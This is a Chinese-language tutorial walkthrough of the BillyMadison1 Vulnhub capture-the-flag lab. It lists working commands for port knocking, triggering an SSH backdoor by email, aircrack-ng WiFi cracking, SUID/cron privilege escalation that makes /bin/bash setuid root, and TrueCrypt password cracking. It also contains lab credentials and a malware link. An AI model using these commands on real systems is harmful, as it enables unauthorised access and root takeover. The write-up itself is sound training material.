[Vulnhub] BillyMadison1dot Wireshark+Port-Knocking+SMTP+Aircrack-ng+donpcgd+veracrypt
字数 1989 2025-08-19 12:41:24

BillyMadison1靶机渗透测试详细教学文档

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行全端口扫描:

nmap -p- 192.168.8.101 --min-rate 1000 -sC -sV

扫描结果:

  • 开放端口:
    • 22/tcp: SSH (tcpwrapped)
    • 23/tcp: Telnet (tcpwrapped)
    • 69/tcp: TFTP/CalDAV (Radicale calendar and contacts server)
    • 80/tcp: HTTP (Apache 2.4.18)
    • 137/tcp: NetBIOS (closed)
    • 138/tcp: NetBIOS (closed)
    • 139/tcp: NetBIOS (Samba smbd 3.X-4.X)
    • 445/tcp: SMB (Samba smbd 4.3.11-Ubuntu)
    • 2525/tcp: SMTP (SubEthaSMTP)

1.2 Telnet服务检查

通过Telnet连接23端口发现提示信息:

  • 暗示Billy正在破解WiFi
  • 提供密文:rkfpuzrahngvat
  • 提示不使用ROTten加密(实际使用ROT13)

解密密文:

echo "rkfpuzrahngvat" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

解密结果:exschmenuating

2. Web应用分析

2.1 目录发现

访问发现的目录:

http://192.168.8.101/exschmenuating/

发现日记内容:

  • 提到"veronica"可能用于密码
  • 暗示存在.cap文件(Wireshark捕获文件)
  • 文件名可能包含"veronica"

2.2 文件枚举

生成veronica相关字典:

grep -i veronica /usr/share/wordlists/rockyou.txt > veronica.txt

使用gobuster搜索.cap文件:

gobuster dir -u "http://192.168.8.101/exschmenuating/" -w veronica.txt -x cap

发现文件:

http://192.168.8.101/exschmenuating/012987veronica.cap

3. 邮件分析

通过SMTP服务(2525端口)分析邮件通信:

  1. 第一封邮件

    • 主题:VIRUS ALERT!
    • 内容:Eric通知Veronica安装新的防病毒程序
    • 包含恶意链接:http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php

  2. 第二封邮件

    • Veronica回复无法下载,请求通过FTP上传
    • 提到"Spanish Armada"组合(端口敲门提示)
    • 提供视频链接:https://www.油官.com/watch?v=z5YU7JwVy7s

  3. 第三封邮件

    • Eric提供FTP凭据:
      • 用户名:eric
      • 密码:ericdoesntdrinkhisownpee

  4. 第四封邮件

    • Veronica确认账户设置完成

  5. 第五封邮件

    • Eric通知文件已上传到FTP服务器

  6. 第六封邮件

    • Veronica描述电脑异常行为

4. 端口敲门技术

根据邮件提示,使用端口敲门开启FTP服务:

knock 192.168.8.101 1466 67 1469 1514 1981 1986 -d 200

注意:如果未响应,可能需要重启靶机

5. FTP服务利用

使用获得的凭据登录FTP:

ftp eric@192.168.8.101
密码:ericdoesntdrinkhisownpee

获取隐藏文件:

get .notes

文件内容:

  • 提到SSH后门
  • 需要发送特定内容的邮件来激活后门:
    • 内容需包含:"My kid will be a"

6. 激活SSH后门

发送激活邮件:

swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.8.101:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be soccer player"

再次扫描端口确认SSH后门开放:

nmap -p- 192.168.8.101 -Pn --min-rate 1000 -sV

7. 破解无线网络

从FTP下载无线捕获文件:

get eg-01.cap

使用aircrack-ng破解WiFi密码:

aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt

获得密码:triscuit*

8. SSH登录

使用后门端口登录Eric账户:

ssh eric@192.168.8.101 -p 1974

获取local.txt内容:suw82jjapj

9. 权限提升

9.1 查找SUID文件

find / -perm -4000 -type f 2>/dev/null

发现可疑文件:/usr/local/share/sgml/donpcgd

9.2 利用donpcgd提权

  1. 创建临时文件:
touch /tmp/h4ck
  1. 利用donpcgd复制文件:
/usr/local/share/sgml/donpcgd /tmp/h4ck /etc/cron.hourly/h4ck
  1. 创建提权脚本:
echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /etc/cron.hourly/h4ck
chmod +x /etc/cron.hourly/h4ck
  1. 等待cron执行后获取root shell:
bash -p

获取proof.txt内容:dh2i1poad

10. 加密文件破解

10.1 发现加密文件

cd /PRIVATE/
cat hint.txt

提示链接:https://en.维姬百科.org/wiki/Billy_Madison

10.2 生成字典

cewl --depth 0 https://en.维姬百科.org/wiki/Billy_Madison > ./billy.txt

10.3 破解加密文件

truecrack -v -t BowelMovement -w billy.txt

获得密码:execrable

10.4 挂载加密卷

sudo cryptsetup --type tcrypt open BowelMovement h4ck13
sudo mkdir /mnt/h4ck13
sudo mount /dev/mapper/h4ck13 /mnt/h4ck13
cp /mnt/h4ck13/secret.zip ./
unzip secret.zip

11. Firefox端口限制绕过

如需访问非标准端口(如69端口),修改Firefox配置:

  1. 地址栏输入:about:config
  2. 搜索或创建:network.security.ports.banned.override
  3. 添加允许的端口号,如:69(多个端口用逗号分隔)
  4. 重启Firefox生效

关键知识点总结

  1. 信息收集:全面的端口扫描和目录枚举
  2. 密码学:ROT13加密识别与解密
  3. 社会工程学:从邮件通信中提取关键信息
  4. 端口敲门:特定端口序列触发服务开放
  5. 无线安全:Wireshark捕获文件分析与破解
  6. 后门利用:通过特定条件激活隐藏服务
  7. 权限提升:SUID文件滥用和cron任务利用
  8. 加密破解:字典生成与加密卷破解
  9. 配置绕过:浏览器安全限制调整

通过以上步骤,完整地完成了从信息收集到最终获取root权限并破解加密文件的渗透测试过程。

BillyMadison1靶机渗透测试详细教学文档 1. 信息收集阶段 1.1 初始扫描 使用Nmap进行全端口扫描: 扫描结果: 开放端口: 22/tcp: SSH (tcpwrapped) 23/tcp: Telnet (tcpwrapped) 69/tcp: TFTP/CalDAV (Radicale calendar and contacts server) 80/tcp: HTTP (Apache 2.4.18) 137/tcp: NetBIOS (closed) 138/tcp: NetBIOS (closed) 139/tcp: NetBIOS (Samba smbd 3.X-4.X) 445/tcp: SMB (Samba smbd 4.3.11-Ubuntu) 2525/tcp: SMTP (SubEthaSMTP) 1.2 Telnet服务检查 通过Telnet连接23端口发现提示信息: 暗示Billy正在破解WiFi 提供密文: rkfpuzrahngvat 提示不使用ROTten加密(实际使用ROT13) 解密密文: 解密结果: exschmenuating 2. Web应用分析 2.1 目录发现 访问发现的目录: 发现日记内容: 提到"veronica"可能用于密码 暗示存在.cap文件(Wireshark捕获文件) 文件名可能包含"veronica" 2.2 文件枚举 生成veronica相关字典: 使用gobuster搜索.cap文件: 发现文件: 3. 邮件分析 通过SMTP服务(2525端口)分析邮件通信: 第一封邮件 : 主题:VIRUS ALERT ! 内容:Eric通知Veronica安装新的防病毒程序 包含恶意链接: http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php 第二封邮件 : Veronica回复无法下载,请求通过FTP上传 提到"Spanish Armada"组合(端口敲门提示) 提供视频链接: https://www.油官.com/watch?v=z5YU7JwVy7s 第三封邮件 : Eric提供FTP凭据: 用户名: eric 密码: ericdoesntdrinkhisownpee 第四封邮件 : Veronica确认账户设置完成 第五封邮件 : Eric通知文件已上传到FTP服务器 第六封邮件 : Veronica描述电脑异常行为 4. 端口敲门技术 根据邮件提示,使用端口敲门开启FTP服务: 注意:如果未响应,可能需要重启靶机 5. FTP服务利用 使用获得的凭据登录FTP: 获取隐藏文件: 文件内容: 提到SSH后门 需要发送特定内容的邮件来激活后门: 内容需包含:"My kid will be a" 6. 激活SSH后门 发送激活邮件: 再次扫描端口确认SSH后门开放: 7. 破解无线网络 从FTP下载无线捕获文件: 使用aircrack-ng破解WiFi密码: 获得密码: triscuit* 8. SSH登录 使用后门端口登录Eric账户: 获取local.txt内容: suw82jjapj 9. 权限提升 9.1 查找SUID文件 发现可疑文件: /usr/local/share/sgml/donpcgd 9.2 利用donpcgd提权 创建临时文件: 利用donpcgd复制文件: 创建提权脚本: 等待cron执行后获取root shell: 获取proof.txt内容: dh2i1poad 10. 加密文件破解 10.1 发现加密文件 提示链接: https://en.维姬百科.org/wiki/Billy_Madison 10.2 生成字典 10.3 破解加密文件 获得密码: execrable 10.4 挂载加密卷 11. Firefox端口限制绕过 如需访问非标准端口(如69端口),修改Firefox配置: 地址栏输入: about:config 搜索或创建: network.security.ports.banned.override 添加允许的端口号,如: 69 (多个端口用逗号分隔) 重启Firefox生效 关键知识点总结 信息收集 :全面的端口扫描和目录枚举 密码学 :ROT13加密识别与解密 社会工程学 :从邮件通信中提取关键信息 端口敲门 :特定端口序列触发服务开放 无线安全 :Wireshark捕获文件分析与破解 后门利用 :通过特定条件激活隐藏服务 权限提升 :SUID文件滥用和cron任务利用 加密破解 :字典生成与加密卷破解 配置绕过 :浏览器安全限制调整 通过以上步骤,完整地完成了从信息收集到最终获取root权限并破解加密文件的渗透测试过程。